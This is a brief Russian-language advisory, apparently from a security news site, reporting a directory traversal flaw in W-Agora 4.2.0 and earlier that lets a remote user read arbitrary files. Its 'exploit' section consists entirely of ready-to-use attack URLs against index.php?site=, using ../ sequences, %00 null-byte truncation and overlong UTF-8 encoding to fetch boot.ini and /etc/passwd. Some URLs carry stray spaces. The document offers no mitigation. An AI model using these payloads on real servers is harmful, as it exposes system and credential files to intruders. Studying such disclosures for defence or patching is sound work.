Программа: W-Agora 4.2.0 и более ранние версии 

Уязвимость позволяет удаленному пользователю просмотреть произвольные файлы на целевой системе. 

Эксплоит:

http://[target]/w-agora/index.php?site= ../../../../../../../../boot.ini%00

http://[target]/w-agora/index.php?site= ../../../. ./../../../../etc/passwd%00

http://[target]/w-agora/index.php?site= ../../../../../../../../etc/passwd

http://[target]/w-agora/index.php?site= %c0%ae%c0%ae%c0%af%c0%ae%c0
%ae%c0%af%c0%ae%c0%ae%c0%af %c0%ae%c0%ae%c0%af%c0%ae%c0
%ae%c0%af%c0%ae%c0%ae%c0%af %c0%ae%c0%ae%c0%af%c0%ae%c0 %ae%c0%afboot.ini

http://[target]/w-agora/index.php?sit e= ../../../../../../../../boot.ini



Оставить мнение